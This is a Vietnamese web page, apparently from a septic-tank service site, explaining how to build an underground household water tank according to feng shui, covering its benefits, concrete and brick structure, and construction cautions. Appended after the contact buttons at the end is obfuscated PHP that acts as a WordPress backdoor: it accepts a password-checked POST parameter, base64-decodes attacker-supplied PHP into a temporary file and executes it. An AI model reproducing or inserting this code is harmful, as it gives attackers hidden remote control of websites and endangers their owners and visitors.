Xây bể nước ngầm theo phong thủy và các vấn đề liên quan

Có nên xây bể nước ngầm không

Bể nước ngầm là công trình đặc biệt quan trọng trong mỗi gia đình, là nơi đựng nước sinh hoạt hàng ngày cho tất cả các thành viên. Không những thế, bể nước ngầm còn mang những ý nghĩa văn hóa tâm linh, tượng trưng hành thủy, tài lộc và sức khỏe.

Bởi vậy trong quá trình xây dựng nhà ở, biệt thự, … các chủ hộ luôn đặt vấn đề xây bể nước ngầm lên trở thành mối quan tâm hàng đầu. Trong bài viết này, hutbephot-urenco sẽ cùng các bạn tìm hiểu toàn bộ những thông tin quan trọng nhất liên quan đến công trình này.

Xây bể nước ngầm

Bể nước ngầm và thực trạng xây bể nước ngầm hiện nay

Khác với bể nước được xây theo kiểu truyền thống có phần nổi trên mặt đất, vị trí được đặt bên ngoài công trình nhà và chủ yếu để đựng nước mưa thì bể nước ngầm lại được xây chìm ngay dưới nền nhà, không có bất cứ phần nào của bể nhô lên khỏi mặt đất. Với thiết kế bể nước ngầm này, nước sẽ tự động chảy xuống bể cho đến khi đầy mà không cần đến hệ thống máy bơm nước.

Bể nước ngầm được xây dựng với mục đích là nơi tích trữ nguồn nước sạch phục vụ nhu cầu sinh hoạt và sản xuất. Thi công bể nước ngầm là một công việc vô cùng phức tạp. Để hạn chế tuyệt đối tình trạng bể bị rò rỉ, nước ngấm vào thành bể hoặc gặp phải các sự cố khác, đơn vị xây dựng phải có trình độ kỹ thuật chuyên nghiệp,giàu kinh nghiệm cùng sự hỗ trợ của các trang thiết bị chuyên dụng.

Thực trạng xây bể nước ngầm hiện nay

Bể nước ngầm được xây dựng chủ yếu tại các công trình nhà ở, biệt thự, chung cư, tòa nhà văn phòng,… trong khu đô thị, thành phố bởi diện tích mặt bằng đất tương đối nhỏ hẹp. Giải pháp tối ưu mà các chủ hộ thường lựa chọn để xây dựng bể nước ngầm đó chính là xây bể nước ngầm trong nhà.

Có nên xây bể nước ngầm không?

Nước có vai trò vô cùng quan trọng, là nhân tố tác động trực tiếp đến đời sống sinh hoạt con người và duy trì các hoạt động sản xuất. Do đó nếu không có bể tích nước, chắc chắn quá trình sinh hoạt và sản xuất của bạn sẽ bị gián đoạn hoặc gặp rất nhiều khó khăn.

Xây dựng bể nước ngầm là việc làm cần thiết của tất cả các gia đình. Với những kỹ thuật thi công hiện đại tiên tiến như ngày nay, công trình bể nước ngầm đã và đang thể hiện được những ưu điểm vượt trội:

+ Độ bền cực cao: Bể được xây hoàn toàn bằng gạch, bê tông cốt thép vì vậy nó sẽ có sức sống lâu bền cùng thời gian.

+ Đảm bảo vệ sinh: Bể được xây trong lòng đất, có nắp bể nước ngầm đậy kín rất sạch sẽ, không bị vi sinh vật xâm nhập và đảm bảo an toàn vệ sinh.

+ Tiết kiệm diện tích, tối ưu chi phí

Có nên xây bể nước ngầm không

Kết cấu bể nước ngầm

Hiểu được kết cấu bể nước ngầm, bạn sẽ có cái nhìn tổng quát hơn và hiểu hơn về giải pháp thi công hạng mục này.

– Phần đáy: Đáy của bể nước thường được đổ bằng bê tông cốt thép mac 200 và độ dày tối thiểu là 100mm.

– Phần tường: Tường bể nên được xây bằng gạch đặc mác 75, vữa xi măng cát mác 50, trát mặt trong bể làm hai lớp, cuối cùng dùng xi măng nguyên chất để đánh mày.

– Phần nắp: Nắp của bể có tác dụng che chắn khỏi vi sinh vật xâm nhập nên cần được làm chắc chắn và thường được đúc bằng những tấm đan bê tông cốt thép có độ dày cực cao lên đến 50cm.

– Gạch trước khi sử dụng phải được ngâm nước kĩ càng đê đảm bảo độ thấm nước vừa phải và khả năng giãn nở.

– Xây dựng bể nước ngầm phải được láng dốc về phía rốn bể với kích thước nhỏ nhất là 250×250.

– Nên chia bể nước ngầm thành nhiều ngăn để giảm bớt áp lực của nước vào thành bể, giảm thiểu khả năng chống thấm.

Xem thêm: Dịch vụ hết bể phốt tại hà nội uy tín

Tính toán tiêu chuẩn thiết kế bể nước ngầm

Video dưới đây sẽ giúp bạn tính toán tiêu chuẩn thiết kế bể nước ngầm.

Những lưu ý trong biện pháp thi công bể nước ngầm

Dưới đây là những lưu ý trong biện pháp thi công bể nước ngầm mà bạn cần phải biết.

– Xây bể nước ngầm tuyệt đối không được rò rỉ:

+ Rò rỉ bể nước ngầm không chỉ làm ảnh hưởng trực tiếp đến công trình về chất lượng mà còn có thể dẫn đến những tác hại không mong muốn ảnh hưởng đến sức khỏe, công việc, kinh doanh, … của chủ nhà và các thành viên.

+ Để khắc phục tuyệt đối tình trạng này, các chuyên gia luôn khuyên bạn sử dụng gạch đặc để xây bể nước ngầm.

– Xây bể nước ngầm cần tránh xa bể phốt: Có thể đối với những gia đình sinh sống tại các thành phố lớn, việc xây cách xa 2 công trình này là rất khó bởi diện tích hẹp. Nhưng để tốt nhất, bạn nên xây 2 bể tương ứng với 2 khoang móng khác nhau để đảm bảo an toàn nhất.

– Xây dựng bể nước ngầm chú ý đến hệ thống ống cấp thoát nước:

+ Ưu tiên sử dụng các loại ống cấp thoát nước có chất lượng cao, bền cùng thời gian. Sử dụng ống nhựa PVC là phương án tối ưu dành cho công trình xây dựng bể nước ngầm của gia đình bạn.

+ Không được xây gạch trức tiếp đè lên ống thoát nước gây vỡ, hư hại ống.

+ Nếu đường ống đi qua tường hoặc nền nhà, bạn cần phải để lỗ chờ với chiều rộng từ 15cm -25cm.

Để xây bể nước ngầm theo phong thủy với chất lượng tốt nhất và tìm vị trí bể nước ngầm nên đặt ở đâu bạn hãy liên hệ với những địa chỉ xây dựng uy tín, khảo sát giá xây bể nước ngầm trước khi bắt tay vào ký kết hợp đồng.

Nguyễn Ngọc Hải

Gọi Ngay

Contact Me on Zalo
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}